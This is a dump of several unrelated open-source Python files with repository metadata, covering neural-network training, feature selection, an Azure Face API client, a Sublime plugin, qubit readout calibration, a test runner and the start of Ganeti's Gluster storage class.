t_op = sess.run(vDNN.train_op, feed_dict = feed_dict_train)
step += 1
global_step += 1
if step % (config.steps_per_epoch // 5) == 0:
# Evaluate model
improved = ''
sess.run(tf.local_variables_initializer())
x_test, y_test = readerTest.next_batch(config.batch_size)
feed_dict_test = {vDNN.x: x_test.values, vDNN.y_true: y_test.values, vDNN.keep_prob: 1.0,
vDNN.training_phase: False}#, vDNN.beta: 0.0}
t_acc, t_loss, t_summary = sess.run([vDNN.accuracy, vDNN.cross_entropy, vDNN.merge_op],
feed_dict = feed_dict_train)
v_acc, v_loss, v_auc, v_summary, = sess.run([vDNN.accuracy, vDNN.cross_entropy, vDNN.auc_op, vDNN.merge_op],
feed_dict = feed_dict_test)
vDNN.train_writer.add_summary(t_summary, step)
vDNN.test_writer.add_summary(v_summary, step)
if epoch > 5 and v_acc > v_acc_best:
v_acc_best = v_acc
improved = '[*]'
save_path = saver.save(sess,
os.path.join(directories.checkpoints,
'vDNN_{}_{}_best.ckpt'.format(config.mode, config.channel)),
global_step = epoch)
print('Epoch {}, Step {} | Training Acc: {:.3f} | Test Acc: {:.3f} | Test Loss: {:.3f} | Test AUC {:.3f} ({:.2f} s) {}'
.format(epoch, step, t_acc, v_acc, v_loss, v_auc, time.time() - start_time, improved))
save_path = saver.save(sess, os.path.join(directories.checkpoints, 'vDNN_{}_{}_end.ckpt'.format(config.mode, config.channel)),
global_step = epoch)
print('Model saved to file: {}'.format(save_path))
feed_dict_train = {vDNN.x: df_X_train.values, vDNN.y_true: df_y_train.values, vDNN.keep_prob: 1.0, vDNN.training_phase: False}
feed_dict_test = {vDNN.x: df_X_test.values, vDNN.y_true: df_y_test.values, vDNN.keep_prob: 1.0, vDNN.training_phase: False}
final_t_acc = vDNN.accuracy.eval(feed_dict = feed_dict_train)
final_v_acc, final_v_AUC = sess.run([vDNN.accuracy, vDNN.auc_op], feed_dict = feed_dict_test)
delta_t = time.time() - start_time
print("Training Complete. Time elapsed: {:.3f} s".format(delta_t))
print("Train accuracy: {:g}\nValidation accuracy: {:g}\nValidation AUC: {:g}".format(final_t_acc, final_v_acc, final_v_AUC))
print('Architecture: {}'.format(architecture))
save_summary(config, delta_t, final_t_acc, final_v_acc, final_v_AUC)
# In[ ]:
train(config)
# In[ ]:
train(config)#, restore = True)
# #### Making Predictions
# Classification on a new instance is given by the softmax of the output of the final readout layer.
# In[12]:
ckpt = tf.train.get_checkpoint_state(directories.checkpoints)
#vDNN = vanillaDNN(config, training = False)
network_output = vDNN.predict(ckpt)
np.save(os.path.join(directories.checkpoints, '{}_{}_y_pred.npy'.format(config.channel, config.mode)), network_output)
np.save(os.path.join(directories.checkpoints, '{}_{}_y_test.npy'.format(config.channel, config.mode)), df_y_test.values)
# In[ ]:
|
Justin-Tan/hep-analysis
|
classifiers/selu_dnn.py
|
Python
|
gpl-3.0
| 27,946
|
"""
Example showing the use of the mifs module.
"""
import mifs
from sklearn.datasets import make_classification, make_regression
import numpy as np
def check_selection(selected, i, r):
"""
Check FN, FP, TP ratios among the selected features.
"""
# reorder selected features
try:
selected = set(selected)
all_f = set(range(i+r))
TP = len(selected.intersection(all_f))
FP = len(selected - all_f)
FN = len(all_f - selected)
if (TP+FN) > 0:
sens = TP/float(TP + FN)
else:
sens = np.nan
if (TP+FP) > 0:
prec = TP/float(TP + FP)
else:
prec = np.nan
except:
sens = np.nan
prec = np.nan
return sens, prec
if __name__ == '__main__':
# variables for dataset
s = 200
f = 100
i = int(.1*f)
r = int(.05*f)
c = 2
# simulate dataset with discrete class labels in y
X, y = make_classification(n_samples=s, n_features=f, n_informative=i,
n_redundant=r, n_clusters_per_class=c,
random_state=0, shuffle=False)
# perform feature selection
MIFS = mifs.MutualInformationFeatureSelector(method='JMI', verbose=2)
MIFS.fit(X,y)
# calculate precision and sensitivity
sens, prec = check_selection(np.where(MIFS._support_mask)[0], i, r)
print ('Sensitivity: ' + str(sens) + ' Precision: ' + str(prec))
# simulate dataset with continuous y
X, y = make_regression(n_samples=s, n_features=f, n_informative=i,
random_state=0, shuffle=False)
# perform feature selection
MIFS = mifs.MutualInformationFeatureSelector(method='JMI', verbose=2,
categorical = False)
MIFS.fit(X,y)
# calculate precision and sensitivity
sens, prec = check_selection(np.where(MIFS._support_mask)[0], i, r)
print ('Sensitivity: ' + str(sens) + ' Precision: ' + str(prec))
|
danielhomola/mifs
|
examples/examples.py
|
Python
|
bsd-3-clause
| 2,058
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class FaceListOperations(object):
"""FaceListOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def create(
self, face_list_id, name=None, user_data=None, custom_headers=None, raw=False, **operation_config):
"""Create an empty face list. Up to 64 face lists are allowed to exist in
one subscription.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param name: User defined name, maximum length is 128.
:type name: str
:param user_data: User specified data. Length should not exceed 16KB.
:type user_data: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
body = models.NameAndUserDataContract(name=name, user_data=user_data)
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body, 'NameAndUserDataContract')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get(
self, face_list_id, custom_headers=None, raw=False, **operation_config):
"""Retrieve a face list's information.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: FaceList or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.FaceList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('FaceList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, face_list_id, name=None, user_data=None, custom_headers=None, raw=False, **operation_config):
"""Update information of a face list.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param name: User defined name, maximum length is 128.
:type name: str
:param user_data: User specified data. Length should not exceed 16KB.
:type user_data: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
body = models.NameAndUserDataContract(name=name, user_data=user_data)
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body, 'NameAndUserDataContract')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, face_list_id, custom_headers=None, raw=False, **operation_config):
"""Delete an existing face list according to faceListId. Persisted face
images in the face list will also be deleted.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieve information about all existing face lists. Only faceListId,
name and userData will be returned.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~azure.cognitiveservices.vision.face.models.FaceList] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[FaceList]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete_face(
self, face_list_id, persisted_face_id, custom_headers=None, raw=False, **operation_config):
"""Delete an existing face from a face list (given by a persisitedFaceId
and a faceListId). Persisted image related to the face will also be
deleted.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param persisted_face_id: Id referencing a particular persistedFaceId
of an existing face.
:type persisted_face_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}/persistedFaces/{persistedFaceId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$'),
'persistedFaceId': self._serialize.url("persisted_face_id", persisted_face_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def add_face_from_url(
self, face_list_id, url, user_data=None, target_face=None, custom_headers=None, raw=False, **operation_config):
"""Add a face to a face list. The input face is specified as an image with
a targetFace rectangle. It returns a persistedFaceId representing the
added face, and persistedFaceId will not expire.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param url:
:type url: str
:param user_data: User-specified data about the face for any purpose.
The maximum length is 1KB.
:type user_data: str
:param target_face: A face rectangle to specify the target face to be
added to a person in the format of "targetFace=left,top,width,height".
E.g. "targetFace=10,10,100,100". If there is more than one face in the
image, targetFace is required to specify which face to add. No
targetFace means there is only one face detected in the entire image.
:type target_face: list[int]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PersistedFace or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.PersistedFace or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
image_url = models.ImageUrl(url=url)
# Construct URL
url = '/facelists/{faceListId}/persistedFaces'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if user_data is not None:
query_parameters['userData'] = self._serialize.query("user_data", user_data, 'str', max_length=1024)
if target_face is not None:
query_parameters['targetFace'] = self._serialize.query("target_face", target_face, '[int]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(image_url, 'ImageUrl')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PersistedFace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def add_face_from_stream(
self, face_list_id, image, user_data=None, target_face=None, custom_headers=None, raw=False, callback=None, **operation_config):
"""Add a face to a face list. The input face is specified as an image with
a targetFace rectangle. It returns a persistedFaceId representing the
added face, and persistedFaceId will not expire.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param image: An image stream.
:type image: Generator
:param user_data: User-specified data about the face for any purpose.
The maximum length is 1KB.
:type user_data: str
:param target_face: A face rectangle to specify the target face to be
added to a person in the format of "targetFace=left,top,width,height".
E.g. "targetFace=10,10,100,100". If there is more than one face in the
image, targetFace is required to specify which face to add. No
targetFace means there is only one face detected in the entire image.
:type target_face: list[int]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param callback: When specified, will be called with each chunk of
data that is streamed. The callback should take two arguments, the
bytes of the current chunk of data and the response object. If the
data is uploading, response will be None.
:type callback: Callable[Bytes, response=None]
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PersistedFace or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.PersistedFace or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}/persistedFaces'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if user_data is not None:
query_parameters['userData'] = self._serialize.query("user_data", user_data, 'str', max_length=1024)
if target_face is not None:
query_parameters['targetFace'] = self._serialize.query("target_face", target_face, '[int]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/octet-stream'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._client.stream_upload(image, callback)
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PersistedFace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
|
lmazuel/azure-sdk-for-python
|
azure-cognitiveservices-vision-face/azure/cognitiveservices/vision/face/operations/face_list_operations.py
|
Python
|
mit
| 21,709
|
import sublime
import os
import sys
def plugin_loaded():
if sublime.platform() in ('linux', 'osx') and sublime.version() > '3000':
path = os.path.join(sublime.packages_path(), 'Codecs33', 'lib')
if path not in sys.path:
sys.path.append(path)
else:
print('Warning: Codecs33 is only working for Sublime Text 3 on linux or osx')
|
NemoChenTW/sublime-config
|
sublime-text-3/Packages/Codecs33/Codecs33.py
|
Python
|
apache-2.0
| 338
|
from .. import data_reduce
from ..ponyfiles.data_structures import *
def readout_passthrough(device, qubit_id, length, amplitudes):#, lengths):
readout_channel = [i for i in device.get_qubit_readout_channel_list(qubit_id).keys()][0]
adc, mnames = device.setup_adc_reducer_iq(qubit_id, raw=True)
adc.set_nop(int(device.get_sample_global('readout_adc_points')))
adc.set_nums(int(device.get_sample_global('uncalibrated_readout_nums')))
mean_sample = data_reduce.data_reduce(adc)
mean_sample.filters['Mean_Voltage_AC'] = data_reduce.mean_reducer_noavg(adc, 'Voltage', 0)
mean_sample.filters['Std_Voltage_AC'] = data_reduce.std_reducer_noavg(adc, 'Voltage', 0, 1)
mean_sample.filters['S21'] = data_reduce.thru(adc, mnames[qubit_id])
def set_amplitude(amplitude):
device.pg.set_seq(device.trigger_readout_seq+[device.pg.p(readout_channel, length, device.pg.rect, amplitude)])
# refers to Awg_iq_multi calibrations
metadata = {'channel': readout_channel, 'qubit_id':qubit_id, 'averages': device.modem.adc.get_nums(), 'length': length}
references = {'frequency_controls':device.get_frequency_control_measurement_id(qubit_id=qubit_id)}
if hasattr(device.awg_channels[readout_channel], 'get_calibration_measurement'):
references['channel_calibration'] = device.awg_channels[readout_channel].get_calibration_measurement()
def create_compression_dataset(measurement):
parameters = [MeasurementParameter(values=amplitudes[2:], name='amplitude', setter=False)]
measurement.datasets['compression'] = MeasurementDataset(parameters, np.zeros(len(amplitudes) - 2) * np.nan)
parameters = [MeasurementParameter(values=amplitudes[2:], name='amplitude', setter=False)]
measurement.datasets['cos_dist'] = MeasurementDataset(parameters, np.zeros(len(amplitudes) - 2) * np.nan)
measurement = device.sweeper.sweep(mean_sample,
(amplitudes, set_amplitude, 'amplitude'),
#(lengths, set_pulse_length, 'length'),
measurement_type='readout_passthrough',
metadata=metadata,
references=references,
on_start = [(create_compression_dataset, tuple())],
on_update = [(compression, tuple()),
(spread, tuple())])
return measurement
def spread(measurement, _):
zero_noise = np.mean(measurement.datasets['Std_Voltage_AC'].data[0,:])
zero_noise_std = np.std(measurement.datasets['Std_Voltage_AC'].data[0,:])
drive_amplitudes = measurement.datasets['Mean_Voltage_AC'].parameters[0].values[1:]
noise = measurement.datasets['Std_Voltage_AC'].data[1:,:]
additional_noise_ratio = np.mean(np.abs(noise-zero_noise), axis=1)/zero_noise_std
#print (additional_noise_ratio)
spread_point = np.argmax(additional_noise_ratio>2) ###TODO: statistics doesn't work this way, there is a cleaner way of checking
if np.any(spread_point):
measurement.metadata['additional_noise_appears'] = str(drive_amplitudes[spread_point+1])
else:
measurement.metadata['additional_noise_appears'] = 'nan'#ro_amplitude = drive_amplitudes[-1]
#print (spread/noise_spread)
def compression(measurement, _):
zero_response = measurement.datasets['Mean_Voltage_AC'].data[0,:]
drive_amplitudes = measurement.datasets['Mean_Voltage_AC'].parameters[0].values[1:]
signal = measurement.datasets['Mean_Voltage_AC'].data[1:,:]
noise = measurement.datasets['Std_Voltage_AC'].data[1:,:]
error = noise/np.sqrt(int(measurement.metadata['averages']))
signal_overlap = np.sum(np.conj(signal[0,:])*signal[1:,:], axis=1)/drive_amplitudes[1:]
cos_dist = np.sum(np.conj(signal[0, :])*signal[1:, :], axis=1)/np.sum(np.abs(signal[0, :]*signal[1:, :]), axis=1)
signal_overlap_estimate = np.real(signal_overlap[0])
signal_overlap_error = 0.5*np.sqrt(np.sum((np.abs(signal[1:,:])*error[0,:])**2, axis=1)+np.sum((np.abs(signal[0,:])*error[1:,:])**2,axis=1))/drive_amplitudes[1:]
#signal_overlap_estimate = (np.sum(np.abs(signal[0,:])**2) - np.sum(error[0,:]*np.abs(signal[0,:]))-np.sum(np.abs(error[0,:])**2))/drive_amplitudes[0]
#plt.figure()
#plt.plot(np.real(signal_overlap))
#plt.plot(np.sum(noise**2, axis=1)/adc.get_nums())
#plt.plot(signal_overlap_error)
compression = 10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate))
db_compression_point1 = np.argmax(np.abs(10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate)))>0.8)#-10*np.log10(1-signal_overlap_error/signal_overlap_estimate))
db_compression_point2 = np.argmax(np.max(cos_dist)-cos_dist>0.01)
if np.any(db_compression_point1) and np.any(db_compression_point2):
db_compression_point = np.min([db_compression_point1, db_compression_point2])
elif np.any(db_compression_point1):
db_compression_point = db_compression_point1
elif np.any(db_compression_point2):
db_compression_point = db_compression_point2
else:
db_compression_point = None
#10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate)),-1+10*np.log10(1-signal_overlap_error/signal_overlap_estimate)
#10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate))<-1+10*np.log10(1-signal_overlap_error/signal_overlap_estimate)
if db_compression_point is not None:
measurement.metadata['compression_1db'] = str(drive_amplitudes[db_compression_point+1])
else:
measurement.metadata['compression_1db'] = 'nan'
measurement.datasets['compression'].data[:] = compression[:]
measurement.datasets['cos_dist'].data[:] = cos_dist[:]
#print("Readout amplitude:",ro_amplitude)
|
ooovector/qtlab_replacement
|
qubit_calibrations/readout_passthrough.py
|
Python
|
gpl-3.0
| 5,395
|
from imp import new_module;
from sys import modules;
PyTest = modules["PyTest"] = new_module( "PyTest" );
from pytestsuite import *;
from pytestworld import *;
from pytesttracker import *;
from pytestverbosecui import *;
from pytestsimplecui import *;
from pytestmock import *;
class PyTestRunner:
def __init__( self, places, singleTest ):
self._singleTest = singleTest
self._world = PyTestWorld( places );
self._buildSuites();
def run( self ):
if self._world.loadFailed():
return ;
self._runSuites();
def _buildSuites( self ):
PyTest.suites = [];
for ( suiteName, suiteClass ) in PyTest.suiteClasses.items():
PyTest.suites.append( suiteClass() );
def _runSuites( self ):
self._setUpWrapper();
self._runSuiteWrapper();
self._tearDownWrapper();
def _setUpWrapper( self ):
PyTest.tracker.enterWorld( self._world.description() );
self._world.setUp();
def _runSuiteWrapper( self ):
for suite in PyTest.suites:
if self._singleTest:
suite._runSingleTest( self._singleTest )
else:
suite._run();
def _tearDownWrapper( self ):
self._world.tearDown();
PyTest.tracker.leaveWorld( self._world.description() );
def run( argv ):
if len( argv ) > 2 and argv[1] == "--verbose":
PyTest.ui = PyTestVerboseCui();
del argv[1];
elif len( argv ) > 2 and argv[1] == "--cui":
PyTest.ui = PyTestSimpleCui();
del argv[1];
else:
PyTest.ui = PyTestSimpleGui();
SINGLE_TEST = "--singleTest="
if len( argv ) > 2 and argv[ 1 ].startswith( SINGLE_TEST ):
singleTest = argv[ 1 ][ len( SINGLE_TEST ) : ]
else:
singleTest = None
places = argv[1:];
PyTest.tracker = PyTestTracker();
PyTest.mockTable = PyTestMockTable();
PyTest.runner = PyTestRunner( places, singleTest );
PyTest.runner.run();
if PyTest.tracker._testsFailed > 0:
exit( 1 )
__all__ = [ "PyTestRunner", "run" ];
if __name__ == "__main__":
from sys import argv;
run( argv )
|
smsisko/Voodoo-Mock
|
pytest/pytestrunner.py
|
Python
|
gpl-2.0
| 2,161
|
#
#
# Copyright (C) 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Gluster storage class.
This class is very similar to FileStorage, given that Gluster when mounted
behaves essentially like a regular file system. Unlike RBD, there are no
special provisions for block device abstractions (yet).
"""
import logging
import os
import socket
from ganeti import utils
from ganeti import errors
from ganeti import netutils
from ganeti import constants
from ganeti import ssconf
from ganeti.utils import io
from ganeti.storage import base
from ganeti.storage.filestorage import FileDeviceHelper
class GlusterVolume(object):
"""This class represents a Gluster volume.
Volumes are uniquely identified by:
- their IP address
- their port
- the volume name itself
Two GlusterVolume objects x, y with same IP address, port and volume name
are considered equal.
"""
def __init__(self, server_addr, port, volume, _run_cmd=utils.RunCmd,
_mount_point=None):
"""Creates a Gluster volume object.
@type server_addr: str
@param server_addr: The address to connect to
@type port: int
@param port: The port to connect to (Gluster standard is 24007)
@type volume: str
@param volume: The gluster volume to use for storage.
"""
self.server_addr = server_addr
server_ip = netutils.Hostname.GetIP(self.server_addr)
self._server_ip = server_ip
port = netutils.ValidatePortNumber(port)
self._port = port
self._volume = volume
if _mount_point: # tests
self.mount_point = _mount_point
else:
self.mount_point = ssconf.SimpleStore().GetGlusterStorageDir()
self._run_cmd = _run_cmd
@property
def server_ip(self):
return self._server_ip
@property
def port(self):
return self._port
@property
def volume(self):
return self._volume
def __eq__(self, other):
return (self.server_ip, self.port, self.volume) == \
(other.server_ip, other.port, other.volume)
def __repr__(self):
return """GlusterVolume("{ip}", {port}, "{volume}")""" \
.format(ip=self.server_ip, port=self.port, volume=self.volume)
def __hash__(self):
return (self.server_ip, self.port, self.volume).__hash__()
def _IsMounted(self):
"""Checks if we are mounted or not.
@rtype: bool
@return: True if this volume is mounted.
"""
if not os.path.exists(self.mount_point):
return False
return os.path.ismount(self.mount_point)
def _GuessMountFailReasons(self):
"""Try and give reasons why the mount might've failed.
@rtype: str
@return: A semicolon-separated list of problems found with the current setup
suitable for display to the user.
"""
reasons = []
# Does the mount point exist?
if not os.path.exists(self.mount_point):
reasons.append("%r: does not exist" % self.mount_point)
# Okay, it exists, but is it a directory?
elif not os.path.isdir(self.mount_point):
reasons.append("%r: not a directory" % self.mount_point)
# If, for some unfortunate reason, this folder exists before mounting:
#
# /var/run/ganeti/gluster/gv0/10.0.0.1:30000:gv0/
# '--------- cwd ------------'
#
# and you _are_ trying to mount the gluster volume gv0 on 10.0.0.1:30000,
# then the mount.glusterfs command parser gets confused and this command:
#
# mount -t glusterfs 10.0.0.1:30000:gv0 /var/run/ganeti/gluster/gv0
# '-- remote end --' '------ mountpoint -------'
#
# gets parsed instead like this:
#
# mount -t glusterfs 10.0.0.1:30000:gv0 /var/run/ganeti/gluster/gv0
# '-- mountpoint --' '----- syntax error ------'
#
# and if there _is_ a gluster server running locally at the default remote
# end, localhost:24007, then this is not a network error and therefore... no
